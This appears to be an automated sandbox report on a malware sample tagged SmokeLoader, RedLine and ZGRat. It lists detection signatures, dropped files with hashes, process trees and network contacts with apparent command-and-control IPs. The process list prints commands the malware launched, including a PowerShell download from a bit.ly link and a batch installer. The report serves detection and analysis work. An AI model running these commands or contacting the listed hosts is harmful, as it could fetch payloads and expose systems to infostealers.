Malware Analysis Report

2025-03-15 05:17

Sample ID 231218-1962eadfeq
Target 0x00310000000142c9-42.dat
SHA256 2b3edccf5deb78e43bf9267a60f85b096b25f15cf6bd1c83c56404d7fe0e7dda
Tags
smokeloader redline livetraffic up3 backdoor infostealer trojan zgrat rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2b3edccf5deb78e43bf9267a60f85b096b25f15cf6bd1c83c56404d7fe0e7dda

Threat Level: Known bad

The file 0x00310000000142c9-42.dat was found to be: Known bad.

Malicious Activity Summary

smokeloader redline livetraffic up3 backdoor infostealer trojan zgrat rat

ZGRat

RedLine

RedLine payload

Detect ZGRat V1

Smokeloader family

SmokeLoader

Downloads MZ/PE file

Executes dropped EXE

Deletes itself

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Unsigned PE

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-18 22:22

Signatures

Smokeloader family

smokeloader

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-18 22:22

Reported

2023-12-18 22:24

Platform

win7-20231215-en

Max time kernel

28s

Max time network

89s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6D44.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8161.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1200 wrote to memory of 2676 N/A N/A C:\Users\Admin\AppData\Local\Temp\6D44.exe
PID 1200 wrote to memory of 2676 N/A N/A C:\Users\Admin\AppData\Local\Temp\6D44.exe
PID 1200 wrote to memory of 2676 N/A N/A C:\Users\Admin\AppData\Local\Temp\6D44.exe
PID 1200 wrote to memory of 2676 N/A N/A C:\Users\Admin\AppData\Local\Temp\6D44.exe
PID 1200 wrote to memory of 2828 N/A N/A C:\Users\Admin\AppData\Local\Temp\8161.exe
PID 1200 wrote to memory of 2828 N/A N/A C:\Users\Admin\AppData\Local\Temp\8161.exe
PID 1200 wrote to memory of 2828 N/A N/A C:\Users\Admin\AppData\Local\Temp\8161.exe
PID 1200 wrote to memory of 2828 N/A N/A C:\Users\Admin\AppData\Local\Temp\8161.exe

Processes

C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe

"C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"

C:\Users\Admin\AppData\Local\Temp\6D44.exe

C:\Users\Admin\AppData\Local\Temp\6D44.exe

C:\Users\Admin\AppData\Local\Temp\8161.exe

C:\Users\Admin\AppData\Local\Temp\8161.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

Network

Country Destination Domain Proto
RU 185.215.113.68:80 185.215.113.68 tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 104.192.141.1:443 bitbucket.org tcp
RU 5.42.65.125:80 5.42.65.125 tcp
RU 77.105.132.87:17066 tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
DE 140.82.121.3:443 github.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 64.185.227.156:80 api.ipify.org tcp

Files

memory/1792-0-0x0000000000400000-0x000000000040A000-memory.dmp

memory/1792-2-0x0000000000400000-0x000000000040A000-memory.dmp

memory/1200-1-0x0000000002620000-0x0000000002636000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6D44.exe

MD5 9a747219c8fab73e2ba0541e3d86cd8b
SHA1 0723a7c85108ebd6a8141a7ce2459c35add81a0c
SHA256 eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01
SHA512 acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83

memory/2676-14-0x00000000000E0000-0x0000000000132000-memory.dmp

memory/2676-19-0x0000000074B70000-0x000000007525E000-memory.dmp

memory/2676-20-0x0000000005090000-0x00000000050D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8161.exe

MD5 93fbe8d58f4b01f59ca937652e31eaf2
SHA1 7a2174923e079927b7958c470936cac5a3531fb0
SHA256 36dcb91a2e2d215b994d8c186bc9b700256f89dbeb8755174c7d9c9783a72375
SHA512 2779d74c5b7421614b97c5ca5bf89480836b99480d4d4097412f7927f1eaac39ecf2a3ccf31d5466245af7940a329c6df95019c117ee917ba2a11378b38b19cf

C:\Users\Admin\AppData\Local\Temp\8161.exe

MD5 444e16aca6430bd81d9b2a8c5ec03d3a
SHA1 4bace67150714c7f6fb39964185662e9663c84c9
SHA256 5da975f37bedf34090ed8c9af159b28f4d558528c230125f323ee8d330198d2c
SHA512 f6593ff9cb2c03465e70aa6ca12fe44610e3f2fc7d2867129c9cbfb461d304930b5836eb700fe015673b0e6662ef821d1219caacafe1bec06e3dfc733b808581

memory/2828-28-0x0000000074B70000-0x000000007525E000-memory.dmp

memory/2828-29-0x0000000001390000-0x0000000002182000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 3df75168773632c0b0b22c30b563fa6b
SHA1 f49f2893fd05ddac2665a62dfb9c539404888db9
SHA256 5bf6ef91f77ca28072e79145fd8483c86ec17cd4af0debd2b10f940c65ed9046
SHA512 faced7e2e524001d0568dfab1e858ac209fb39a771cc08bd7a3000231a041bf0467f4ce9c114d451f865b4b892b30ff83b27cc1fc0148a0bcf8e74d47b84f521

\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 42bfc03dfd92f38837a93cd1a7192b6b
SHA1 a36cd5b921198419392305d49e084acc955eb1e0
SHA256 466b5a3c0c047dcf7612403a928023b31854a70afa808af03c369f56e4c459b4
SHA512 d718f343222cb52f5b379803f4a16563a2c09ad1aa47e2a2e0576cef9750463e5479decb1f82aabf5d0dd521120f2c25336c011c423f042ae19240439e928d6a

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 c5721320a24fc417b6ab31aad35d0da8
SHA1 4b458495005bff7ccbecbab9f7c8e5db79fe6ad6
SHA256 34735b52225a58c4f1a19ed55cc22cc267b05210b266a0c30f73e399a2f7d95d
SHA512 61cdf3b744300c23dd4ad8999b905dba0a6bbbc0fa5d5dc5832edc776f7f38ef2456887c79744eed8556510bc53c2a4de4a269560dde517fd735a7c70b8a46f6

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 069ac54873a7f27472c62e1b734446e8
SHA1 cc4ba2ac2ea326c4e5cdae2ac47c49635505a6d1
SHA256 124db1665fb3498b6625a9a76cf82ebd68a9fdfd5ea09d14abb8c80cc1d74469
SHA512 12a94740b795a1b23a83e0dd12c47d1ed97c7a0a6f2edb20594aec15a008d021981bf23be09d11f77b443bc13ae15d35fc7912b7f9af324dfbccda38e8f7c409

\Users\Admin\AppData\Local\Temp\nsy8289.tmp\Math.dll

MD5 ebd8a7a5042ae1d4ce1aa9071859c851
SHA1 ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6
SHA256 fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837
SHA512 daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 9293f28345f77d324f8c5a350ecd2b63
SHA1 7c7af60ce86f784c7dd257533c6002da05d06a08
SHA256 aec0b7efe1eefbfda2f68bda142e363c43c649b032554de1e9c6a41b6b357c88
SHA512 b194208dce9aae37153a7b13ea946e1a69250662debd162abd363282dcb3fc99a280b19d57d8ab278af54d399b52c3e6525ed299ce08c51a9c75cc323fe6fe87

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 0f44ea4f7ad14d998b7995caac6c2a39
SHA1 c937d2e9c7105f2c26b164e6d98a307fc4147f50
SHA256 717ac8c5dcdecebc3cb37198e925ee1bf767be39fef80dea42b4c569c5f0f96e
SHA512 0c5b91ab16276318b43dbb7406d71f69d7d41c1032e5f73fc4e46561c42c52bf8cf06c31acbc44dad425903a27b95e4dc0935eabcc23ee16342e61d00078e0ef

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 9aba4f6b81fe111b7cbf15e91f0da3d2
SHA1 dc2a1547a638e43c6a3359402ede56defd44907a
SHA256 b9400948c1c53b4e882a7adab23b6841421da4245cf6875977367368b67043df
SHA512 9a99128bce8f29103d0d6d381d2739ae778bf0023c04188d0db32e8c9a8873bc8af15b67730c2b4ad2578c8c58767682bdf8cf6e43fa571e8147e084d40fcb0e

memory/1628-62-0x00000000028B0000-0x0000000002CA8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 2415122607d4c35b75a99e934603fb0e
SHA1 8989b358c502064a1ac244862687684928c06413
SHA256 f544d8ba4ae2545f65c834a87dc48ee08528e613ccd7b68d7905deb90b682b2a
SHA512 cffc9a761d142c77fba266643e0b918160c53ddcf891a7dc9958703f36b4c34a52dcc845f663d398dd3e08f4f41415e418d9fae1026de07866508791531a4cf9

memory/3004-83-0x0000000000400000-0x0000000000418000-memory.dmp

memory/1196-90-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2712-89-0x00000000001D0000-0x00000000001D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 5f4a6709ed76a8e46881c084ba7e3f65
SHA1 fe435c6fda11c05e5fa32eaedf22b7aeb833a794
SHA256 64bf7af1c4e33f0ca7dd8a2dac5743956e1903521a520e5d9d52658edd6461fd
SHA512 189d6c1dfc02d562b6de657146e8983fb7895f5a640142c70859d5c1bc33ac14be3ff8d41997851b86c3b0b86f76d228df0a1f20cf9157311953b0ad146a497f

memory/1196-87-0x0000000000400000-0x0000000000409000-memory.dmp

\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 de3284b901a049a0ca33686ae77fd32c
SHA1 1e5dc486693f88920bf28b11ab3f2c5c23d73219
SHA256 54629baee0d279a7173e2d8b9b2e94d6f6d705b2aca5c621a271236b12d33e6c
SHA512 d01514aee820061d3bf4936b374b22815ff0163b454b1dd7d558c3b0845e47264cd4f8a7ca0e99096bf115a974182e5fb2df0bd84bc714608f16b71df6b1d81e

memory/2808-85-0x0000000000220000-0x0000000000229000-memory.dmp

memory/1196-82-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1628-91-0x00000000028B0000-0x0000000002CA8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 6496de51be7184118203296edfa03c31
SHA1 cd5abb9a399c6e595c5bf5ce1674a34db9b8cb14
SHA256 af8cfa093cad3953ecc9b6e7d9c7a36bc9bd7f204745c2a0efb2a4c065dd579a
SHA512 7a21eceb52e4826ecf8fab7b4a7d8566752392de4a5ee7ab5f720b24a0015320761e62408d4525b786385c0e691701dc132cf8732e6cb5ff431aed9b5c3933fd

memory/1628-92-0x0000000002CB0000-0x000000000359B000-memory.dmp

memory/2828-80-0x0000000074B70000-0x000000007525E000-memory.dmp

memory/2808-79-0x0000000000A00000-0x0000000000B00000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 62b01ec4a955eab3a7a41e2c07f18913
SHA1 48d8e1e391fa078d78e2130481f9d35eb45a11ec
SHA256 c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56
SHA512 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56

memory/1628-93-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

MD5 0860f85ceba2964798afaa67206d6a8c
SHA1 e84c18900c0fc2fae4ea844603aa51f195aa4654
SHA256 ec48f9dcce8e579a87d95577f129a823be2b522ce4f400e6b967fab302f3d22e
SHA512 bb12f2a10fa43a5159ed4d04ffb5e8a9299d6b7800ed4daf8ef8180a69c34553a8af4cd4f82d623793c8b267ce84f758dd1d020a1c1121943f9df14ee719dc49

\Users\Admin\AppData\Local\Temp\nsy8289.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-18 22:22

Reported

2023-12-18 22:24

Platform

win10v2004-20231215-en

Max time kernel

32s

Max time network

66s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\A539.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3492 wrote to memory of 700 N/A N/A C:\Users\Admin\AppData\Local\Temp\A539.exe
PID 3492 wrote to memory of 700 N/A N/A C:\Users\Admin\AppData\Local\Temp\A539.exe
PID 3492 wrote to memory of 700 N/A N/A C:\Users\Admin\AppData\Local\Temp\A539.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe

"C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"

C:\Users\Admin\AppData\Local\Temp\A539.exe

C:\Users\Admin\AppData\Local\Temp\A539.exe

C:\Users\Admin\AppData\Local\Temp\B15F.exe

C:\Users\Admin\AppData\Local\Temp\B15F.exe

C:\Users\Admin\AppData\Local\Temp\BDA5.exe

C:\Users\Admin\AppData\Local\Temp\BDA5.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c install.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"

C:\Users\Admin\AppData\Local\Temp\is-6NLTA.tmp\tuc3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-6NLTA.tmp\tuc3.tmp" /SL5="$501FC,7276951,68608,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\C288.exe

C:\Users\Admin\AppData\Local\Temp\C288.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Program Files (x86)\StdButton\stdbutton.exe

"C:\Program Files (x86)\StdButton\stdbutton.exe" -s

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 16.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
RU 185.215.113.68:80 185.215.113.68 tcp
US 8.8.8.8:53 68.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 52.217.73.60:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 1.141.192.104.in-addr.arpa udp
US 8.8.8.8:53 60.73.217.52.in-addr.arpa udp
RU 77.105.132.87:17066 tcp
US 8.8.8.8:53 87.132.105.77.in-addr.arpa udp
RU 5.42.65.125:80 tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 4.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 64.185.227.156:80 api.ipify.org tcp
US 8.8.8.8:53 156.227.185.64.in-addr.arpa udp
BG 91.92.254.7:80 91.92.254.7 tcp
US 93.184.216.34:443 tcp
US 52.165.165.26:443 tcp
RU 5.42.64.35:80 tcp

Files

memory/456-0-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3492-1-0x0000000002650000-0x0000000002666000-memory.dmp

memory/456-2-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\A539.exe

MD5 9a747219c8fab73e2ba0541e3d86cd8b
SHA1 0723a7c85108ebd6a8141a7ce2459c35add81a0c
SHA256 eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01
SHA512 acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83

memory/700-12-0x0000000001430000-0x0000000001482000-memory.dmp

memory/700-17-0x0000000074410000-0x0000000074BC0000-memory.dmp

memory/700-18-0x00000000060D0000-0x0000000006674000-memory.dmp

memory/700-19-0x0000000005B20000-0x0000000005BB2000-memory.dmp

memory/700-20-0x0000000005DB0000-0x0000000005DC0000-memory.dmp

memory/700-21-0x0000000005BC0000-0x0000000005BCA000-memory.dmp

memory/700-23-0x0000000007130000-0x0000000007748000-memory.dmp

memory/700-24-0x00000000089B0000-0x0000000008ABA000-memory.dmp

memory/700-25-0x0000000007000000-0x0000000007012000-memory.dmp

memory/700-26-0x0000000007060000-0x000000000709C000-memory.dmp

memory/700-27-0x00000000070B0000-0x00000000070FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B15F.exe

MD5 e6eb3adc80afeb9fe6fcdcd0bcea7b8c
SHA1 cca2f9898a1eb7bbbc7a7fc5c2bfa9205e0c49d4
SHA256 3dae2ea5842c058cda1df0525924b1d29c2b1239074e4a9855d985c48a74cd8c
SHA512 44575b05ed551c9ef9962ae60b496ba85d25452ccf187cda15a13823b5dfa5ac87e559aa13efd276b0ce2dd9a77369a6c9ad53eb56d0700a86607169d862a9a9

C:\Users\Admin\AppData\Local\Temp\B15F.exe

MD5 ee9c445c99d7fa495e63fd30b8859038
SHA1 79fcd4771be0b2e12a5859b161142f784bb9c8f1
SHA256 43a4339cdc20c64ae43a1a98085b526e5aaf0437253b286ff036f24c2da9100b
SHA512 b09de3b15ae3606d3e962135ad4c3e9902d0f1a62d30e5a3220f3fa48935b12b8c27d306a21c34b1be0ae05b15ce688f4b583d65c47c388bfef14f4e8ac6723a

memory/2208-33-0x0000000000960000-0x0000000000DFE000-memory.dmp

memory/2208-34-0x0000000005920000-0x00000000059BC000-memory.dmp

memory/2208-35-0x00000000059F0000-0x0000000005A00000-memory.dmp

memory/2208-32-0x0000000074410000-0x0000000074BC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BDA5.exe

MD5 5d3f41a2bc742603daf1d51270f3c80b
SHA1 252bb1132b20c5db7df0b979ae80f8c4125768ea
SHA256 0f198f58a52c60028c1e8b5287208da608fa1ceb7f151386cd4a82c4704eb18c
SHA512 f05404da6e65c7a34e6ddad42278e44cf815b3a912b34f9098f97883567570fa8df7f939e76585b545a10900b654ffeb398b30cd309e28ed25039e003189b5ea

C:\Users\Admin\AppData\Local\Temp\BDA5.exe

MD5 748c2ecf1e94e3b30fd141c384c467e7
SHA1 b8ae5990fa804d08cdf1227b99e1b39762d28ceb
SHA256 6e927e23597b8e0e61e4582f0b28c6df0fad0797f8c62b37628063188b516149
SHA512 16bad9b21112d47adaeae910c25302872b37e3af9d20014b6042afd40d26e6fd275a726160d28807c324514bbf93f0d3244a55f8ad17ae4acc33adcca45fdf88

memory/1556-40-0x0000000074410000-0x0000000074BC0000-memory.dmp

memory/1556-41-0x0000000000450000-0x0000000001242000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 576a55829236f95e8d8953ad84441001
SHA1 0bf03738d7bcb400e75155bbe0fda1d59ff82065
SHA256 6e0b12ad23efc9133afa8df283266aa29311a2f968ae375078ba56fb6337dd09
SHA512 9bfa392211b368d36009d7a9cb6d7c0450ee9530ba548667d8d28e8c0cfbdccaa4c4ff19fa1bacd8097bb41eb3adc892d746df2e1b48453beb1092f5b5854bf1

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 fbdf8fe1acc9cadc4d1a92296b52392a
SHA1 ad4879b2e4f88f6a93c780cc7e0e73623afdbc71
SHA256 c72e2b5daf376341bf49e28bd98269feb5bd8a4e56d97efb9f74eb85716246a6
SHA512 65d006dec391a65b37f403829f369658521812b2ed0010b746f74c732af58e1cc26b37de83d578a07e162ef10db52bcb66b8c7ba918f3a4cf03d74c4bdcbd14a

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 ca6927f95d88717d7d92abe402d79181
SHA1 284dbdb69c0250a19b220cb0720e779557d4fc5a
SHA256 4f492fde9ebee2d8ceafec27e6e31961d3dfadf1e1aa405cbcf7a48568108be1
SHA512 154c45436d73d66c5bc3a32cc68005b2e1054c6337c57e17c9a38efeb1dd3d9955326e317ade2aeacf72221b73d637fdcc7e5e04824c1b9f85334833c98df871

C:\Users\Admin\AppData\Local\Temp\nscBFA7.tmp\Math.dll

MD5 ebd8a7a5042ae1d4ce1aa9071859c851
